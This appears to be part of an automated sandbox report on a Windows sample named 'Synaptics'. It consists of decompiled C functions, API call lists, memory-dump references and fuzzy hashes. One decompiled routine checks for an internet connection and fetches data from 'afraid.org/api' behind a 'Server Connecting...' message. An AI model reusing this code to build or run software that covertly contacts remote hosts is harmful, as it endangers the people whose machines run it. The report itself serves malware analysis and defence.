                                                                                                                                                                                          0x0040416d
                                                                                                                                                                                          0x00404173
                                                                                                                                                                                          0x0040417f
                                                                                                                                                                                          0x00404189
                                                                                                                                                                                          0x0040418e
                                                                                                                                                                                          0x0040418e
                                                                                                                                                                                          0x004040ff
                                                                                                                                                                                          0x004040e5
                                                                                                                                                                                          0x004040d7
                                                                                                                                                                                          0x004040c3
                                                                                                                                                                                          0x004040b9
                                                                                                                                                                                          0x004040a9
                                                                                                                                                                                          0x004041b5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004040F6
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000408C), ref: 00404133
                                                                                                                                                                                          • RtlUnwind.KERNEL32(?,?,Function_0000408C,00000000,?,?,Function_0000408C,?), ref: 0040415E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$Unwind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1141220122-0
                                                                                                                                                                                          • Opcode ID: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                          • Instruction ID: 064ae43801aa42ded6184c294ad0f6d3c4b4e8b690226dbcba8ce268034621ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: a99d5af059f1aae37b0278c7261ca6e289e14b7bcb43e1f360e26fca2bf73965
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E3134B0604200AFD720DB15D989F277BE9EBD8714F19857AF6049B391D778EC80C769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00495930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E00495930(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v28;
				intOrPtr _t11;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr _t61;
				intOrPtr _t62;

				_t61 = _t62;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t61);
				_push(0x495b6e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				Sleep(0x3e8); // executed
				if(E00474D34(0) == 0) {
					_t11 =  *0x49f134; // 0x22b415c
					E0042F70C(_t11, 1);
				} else {
					_t16 =  *0x49dbdc; // 0x49f13c
					E004967D4( *_t16, __ebx, "Server Connecting...");
					_push(_t61);
					_push(0x495a09);
					_push( *[fs:eax]);
					 *[fs:eax] = _t62;
					_t50 =  *0x49f118; // 0x22b2f48
					_t21 = E00404FC4("afraid.org/api", _t50);
					_t65 = _t21;
					if(_t21 != 0) {
						_t30 =  *0x49f118; // 0x22b2f48
						E00474FC0(_t30, __ebx,  &_v12, __esi);
						E00475110(_v12, __ebx, 1, 0x7c, __edi, __esi, _t65,  &_v8);
						E00404A14(0x49f118, _v8);
					}
					_t22 =  *0x49f114; // 0x22b41b8
					 *((intOrPtr*)( *_t22 + 0x88))();
					_t24 =  *0x49f114; // 0x22b41b8
					 *((intOrPtr*)( *_t24 + 0x8c))();
					_t26 =  *0x49f114; // 0x22b41b8
					 *((intOrPtr*)( *_t26 + 0x94))();
					_pop(_t54);
					 *[fs:eax] = _t54;
				}
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00495B75);
				return E004049E4( &_v28, 6);
			}


















                                                                                                                                                                                          0x00495931
                                                                                                                                                                                          0x00495935
                                                                                                                                                                                          0x00495936
                                                                                                                                                                                          0x00495937
                                                                                                                                                                                          0x00495938
                                                                                                                                                                                          0x00495939
                                                                                                                                                                                          0x0049593a
                                                                                                                                                                                          0x0049593b
                                                                                                                                                                                          0x0049593c
                                                                                                                                                                                          0x0049593d
                                                                                                                                                                                          0x00495940
                                                                                                                                                                                          0x00495941
                                                                                                                                                                                          0x00495946
                                                                                                                                                                                          0x00495949
                                                                                                                                                                                          0x00495951
                                                                                                                                                                                          0x0049595d
                                                                                                                                                                                          0x00495b49
                                                                                                                                                                                          0x00495b4e
                                                                                                                                                                                          0x00495963
                                                                                                                                                                                          0x00495963
                                                                                                                                                                                          0x0049596f
                                                                                                                                                                                          0x00495976
                                                                                                                                                                                          0x00495977
                                                                                                                                                                                          0x0049597c
                                                                                                                                                                                          0x0049597f
                                                                                                                                                                                          0x00495982
                                                                                                                                                                                          0x0049598d
                                                                                                                                                                                          0x00495992
                                                                                                                                                                                          0x00495994
                                                                                                                                                                                          0x0049599d
                                                                                                                                                                                          0x004959a2
                                                                                                                                                                                          0x004959b1
                                                                                                                                                                                          0x004959be
                                                                                                                                                                                          0x004959be
                                                                                                                                                                                          0x004959c9
                                                                                                                                                                                          0x004959d0
                                                                                                                                                                                          0x004959dc
                                                                                                                                                                                          0x004959e3
                                                                                                                                                                                          0x004959ef
                                                                                                                                                                                          0x004959f6
                                                                                                                                                                                          0x004959fe
                                                                                                                                                                                          0x00495a01
                                                                                                                                                                                          0x00495a01
                                                                                                                                                                                          0x00495b55
                                                                                                                                                                                          0x00495b58
                                                                                                                                                                                          0x00495b5b
                                                                                                                                                                                          0x00495b6d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,00495B6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00495951
                                                                                                                                                                                            • Part of subcall function 00474D34: InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                            • Part of subcall function 00474FC0: InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                            • Part of subcall function 00474FC0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                            • Part of subcall function 00474FC0: InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                            • Part of subcall function 00474FC0: InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$Open$CloseConnectedFileHandleReadSleepState
                                                                                                                                                                                          • String ID: Server Connecting...$afraid.org/api
                                                                                                                                                                                          • API String ID: 484477557-4171305320
                                                                                                                                                                                          • Opcode ID: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                          • Instruction ID: 1742280dbad9834e3b98c72a481cfe9cad1f0a6ad81f0c4a7812aa737afa5612
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0219074300600DFD701DB65E853D5A3BA5EB89314B61807BF800C7792DA39AC09CBAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004034E8 Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E004034E8(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = 0x4034c0;
					_t22[7] = E00402D00;
					if(_t22[0x12] == 0) {
						_t22[9] = E00402D00;
						if(_t33 == 3) {
							_t15 = GetStdHandle(0xfffffff5);
						} else {
							_t15 = GetStdHandle(0xfffffff6);
						}
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x49b00c; // 0x0
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x49b06c);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t15 = CreateFileA( &(_t22[0x12]), _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E004028E4(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E004028E4(_t20);
				}
				goto L4;
			}














                                                                                                                                                                                          0x004034eb
                                                                                                                                                                                          0x004034ed
                                                                                                                                                                                          0x004034f1
                                                                                                                                                                                          0x004034fd
                                                                                                                                                                                          0x00403514
                                                                                                                                                                                          0x00403514
                                                                                                                                                                                          0x0040351a
                                                                                                                                                                                          0x0040351d
                                                                                                                                                                                          0x00403524
                                                                                                                                                                                          0x0040352f
                                                                                                                                                                                          0x00403591
                                                                                                                                                                                          0x0040359b
                                                                                                                                                                                          0x004035a3
                                                                                                                                                                                          0x0040359d
                                                                                                                                                                                          0x004035a3
                                                                                                                                                                                          0x004035a3
                                                                                                                                                                                          0x00403531
                                                                                                                                                                                          0x00403531
                                                                                                                                                                                          0x00403536
                                                                                                                                                                                          0x00403542
                                                                                                                                                                                          0x00403548
                                                                                                                                                                                          0x0040354d
                                                                                                                                                                                          0x00403550
                                                                                                                                                                                          0x00403552
                                                                                                                                                                                          0x00403557
                                                                                                                                                                                          0x00403558
                                                                                                                                                                                          0x0040355a
                                                                                                                                                                                          0x00403560
                                                                                                                                                                                          0x00403566
                                                                                                                                                                                          0x00403568
                                                                                                                                                                                          0x0040356d
                                                                                                                                                                                          0x0040356d
                                                                                                                                                                                          0x00403566
                                                                                                                                                                                          0x00403558
                                                                                                                                                                                          0x00403583
                                                                                                                                                                                          0x00403583
                                                                                                                                                                                          0x0040358b
                                                                                                                                                                                          0x004035b1
                                                                                                                                                                                          0x004035b7
                                                                                                                                                                                          0x004035bc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040358d
                                                                                                                                                                                          0x0040358d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040358d
                                                                                                                                                                                          0x0040358b
                                                                                                                                                                                          0x00403502
                                                                                                                                                                                          0x004035aa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004035aa
                                                                                                                                                                                          0x0040350d
                                                                                                                                                                                          0x0040350f
                                                                                                                                                                                          0x0040350f
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000), ref: 00403583
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035A3
                                                                                                                                                                                          • GetLastError.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035B7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorFileHandleLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1572049330-0
                                                                                                                                                                                          • Opcode ID: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                          • Instruction ID: 1e67efa80632d682362f14ea232ee9a6b3403708de1835596950b0ec37a53b76
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911EB61504100BAEB149F19CD887566D5D9F81319F28C2BBD419BF3F9D67CCE4093AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A4E8 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E0045A4E8(void* __eax, char* __ecx, struct tagMSG* __edx) {
				int _t7;
				int _t21;
				MSG* _t30;
				void* _t31;
				char* _t32;

				_t22 = __ecx;
				_push(__ecx);
				_t30 = __edx;
				_t31 = __eax;
				_t21 = 0;
				_t7 = PeekMessageA(__edx, 0, 0, 0, 1); // executed
				if(_t7 != 0) {
					_t21 = 1;
					if(_t30->message == 0x12) {
						 *((char*)(_t31 + 0x9c)) = 1;
					} else {
						 *_t32 = 0;
						if( *((short*)(_t31 + 0xda)) != 0) {
							_t22 = _t32;
							 *((intOrPtr*)(_t31 + 0xd8))();
						}
						if(E0045A448(_t31, _t30) == 0 &&  *_t32 == 0 && E0045A340(_t31, _t30) == 0 && E0045A390(_t31, _t22, _t30) == 0 && E0045A31C(_t31, _t30) == 0) {
							TranslateMessage(_t30);
							DispatchMessageA(_t30); // executed
						}
					}
				}
				return _t21;
			}








                                                                                                                                                                                          0x0045a4e8
                                                                                                                                                                                          0x0045a4eb
                                                                                                                                                                                          0x0045a4ec
                                                                                                                                                                                          0x0045a4ee
                                                                                                                                                                                          0x0045a4f0
                                                                                                                                                                                          0x0045a4fb
                                                                                                                                                                                          0x0045a502
                                                                                                                                                                                          0x0045a504
                                                                                                                                                                                          0x0045a50a
                                                                                                                                                                                          0x0045a572
                                                                                                                                                                                          0x0045a50c
                                                                                                                                                                                          0x0045a50c
                                                                                                                                                                                          0x0045a518
                                                                                                                                                                                          0x0045a51a
                                                                                                                                                                                          0x0045a524
                                                                                                                                                                                          0x0045a524
                                                                                                                                                                                          0x0045a535
                                                                                                                                                                                          0x0045a565
                                                                                                                                                                                          0x0045a56b
                                                                                                                                                                                          0x0045a56b
                                                                                                                                                                                          0x0045a535
                                                                                                                                                                                          0x0045a50a
                                                                                                                                                                                          0x0045a57f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045A4FB
                                                                                                                                                                                          • TranslateMessage.USER32 ref: 0045A565
                                                                                                                                                                                          • DispatchMessageA.USER32 ref: 0045A56B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                                                          • Opcode ID: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                          • Instruction ID: 2ed0c1a20c59febfa1985896f2b2d1bc9742e22b53ed284e6756f8042308f4ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E01FE20B04304A6EA31266B6805F6B97854FD27CAF14425FFD45B7393D6AC9C5E423F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00446564 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00446564(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4465ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x49eb20 =  *0x49eb20 - 1;
				if( *0x49eb20 < 0) {
					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x49eb1c;
					E00446330(_t16, __edi,  *0x49eb1c);
					_t6 =  *0x436dd0; // 0x436e1c
					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
					_t8 =  *0x436dd0; // 0x436e1c
					E0041A548(_t8, _t16, _t17, _t31);
					_t21 =  *0x436dd0; // 0x436e1c
					_t10 =  *0x447948; // 0x447994
					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x436dd0; // 0x436e1c
					_t12 =  *0x4465f4; // 0x446640
					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x436dd0; // 0x436e1c
					_t14 =  *0x44675c; // 0x4467a8
					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4465f1);
				return 0;
			}















                                                                                                                                                                                          0x00446564
                                                                                                                                                                                          0x00446564
                                                                                                                                                                                          0x00446569
                                                                                                                                                                                          0x0044656a
                                                                                                                                                                                          0x0044656f
                                                                                                                                                                                          0x00446572
                                                                                                                                                                                          0x00446575
                                                                                                                                                                                          0x0044657c
                                                                                                                                                                                          0x0044658c
                                                                                                                                                                                          0x0044658c
                                                                                                                                                                                          0x00446593
                                                                                                                                                                                          0x00446598
                                                                                                                                                                                          0x0044659d
                                                                                                                                                                                          0x004465a2
                                                                                                                                                                                          0x004465a7
                                                                                                                                                                                          0x004465ac
                                                                                                                                                                                          0x004465b2
                                                                                                                                                                                          0x004465b7
                                                                                                                                                                                          0x004465bc
                                                                                                                                                                                          0x004465c2
                                                                                                                                                                                          0x004465c7
                                                                                                                                                                                          0x004465cc
                                                                                                                                                                                          0x004465d2
                                                                                                                                                                                          0x004465d7
                                                                                                                                                                                          0x004465d7
                                                                                                                                                                                          0x004465de
                                                                                                                                                                                          0x004465e1
                                                                                                                                                                                          0x004465e4
                                                                                                                                                                                          0x004465e9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                                                                                                                                                            • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                            • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                            • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                            • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                            • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                            • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                            • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                                                                          • String ID: @fD
                                                                                                                                                                                          • API String ID: 3775504709-3452771706
                                                                                                                                                                                          • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                          • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045EFA8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryclipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E0045EFA8(void* __ecx, void* __edx) {
				void* _t7;
				void* _t12;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t22;
				void* _t23;
				void* _t24;

				_t19 = __edx;
				_t18 = __ecx;
				if(__edx != 0) {
					_t24 = _t24 + 0xfffffff0;
					_t7 = E00403F10(_t7, _t23);
				}
				_t17 = _t19;
				_t22 = _t7;
				E00421B3C(_t18, 0);
				 *((intOrPtr*)(_t22 + 0xea)) = E00403BBC(1);
				if(( *(_t22 + 0x1c) & 0x00000010) == 0) {
					 *((intOrPtr*)(_t22 + 0xd2)) = RegisterClipboardFormatA("MsgId_OrtusShellChangeNotifier");
					_t16 = E00451878(E0045E9EC, _t22); // executed
					 *((intOrPtr*)(_t22 + 0xda)) = _t16;
				}
				_t12 = _t22;
				if(_t17 != 0) {
					E00403F68(_t12);
					_pop( *[fs:0x0]);
				}
				return _t22;
			}












                                                                                                                                                                                          0x0045efa8
                                                                                                                                                                                          0x0045efa8
                                                                                                                                                                                          0x0045efac
                                                                                                                                                                                          0x0045efae
                                                                                                                                                                                          0x0045efb1
                                                                                                                                                                                          0x0045efb1
                                                                                                                                                                                          0x0045efb6
                                                                                                                                                                                          0x0045efb8
                                                                                                                                                                                          0x0045efbe
                                                                                                                                                                                          0x0045efcf
                                                                                                                                                                                          0x0045efd9
                                                                                                                                                                                          0x0045efe5
                                                                                                                                                                                          0x0045eff1
                                                                                                                                                                                          0x0045eff6
                                                                                                                                                                                          0x0045eff6
                                                                                                                                                                                          0x0045effc
                                                                                                                                                                                          0x0045f000
                                                                                                                                                                                          0x0045f002
                                                                                                                                                                                          0x0045f007
                                                                                                                                                                                          0x0045f00e
                                                                                                                                                                                          0x0045f015

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegisterClipboardFormatA.USER32 ref: 0045EFE0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MsgId_OrtusShellChangeNotifier, xrefs: 0045EFDB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFormatRegister
                                                                                                                                                                                          • String ID: MsgId_OrtusShellChangeNotifier
                                                                                                                                                                                          • API String ID: 1228543026-1463447210
                                                                                                                                                                                          • Opcode ID: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                          • Instruction ID: 9954d9dd0750aaeb66af585a099ed7c5191191f0ac21a3cbd5b83f5e84ca41d7
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31F0BB62B0061156C220EB7B5C027477EA48F0175AF04443FFC94973D3DA395D0C439E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004781D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 41%
                                                                                                                                                                                          			E004781D4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0);
				_push(_t26);
				_push(0x478221);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				_t20 = __eax;
				E004051EC( &_v8, __eax);
				_push(E004051FC(_v8)); // executed
				L00417E0C(); // executed
				E004781BC(_t9, _t20, _t27);
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00478228);
				return E004050A0( &_v8);
			}







                                                                                                                                                                                          0x004781d4
                                                                                                                                                                                          0x004781d7
                                                                                                                                                                                          0x004781e1
                                                                                                                                                                                          0x004781e2
                                                                                                                                                                                          0x004781e7
                                                                                                                                                                                          0x004781ea
                                                                                                                                                                                          0x004781f1
                                                                                                                                                                                          0x004781f3
                                                                                                                                                                                          0x00478200
                                                                                                                                                                                          0x00478201
                                                                                                                                                                                          0x00478206
                                                                                                                                                                                          0x0047820d
                                                                                                                                                                                          0x00478210
                                                                                                                                                                                          0x00478213
                                                                                                                                                                                          0x00478220

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                            • Part of subcall function 004050A0: SysFreeString.OLEAUT32(088B90C3), ref: 004050AE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
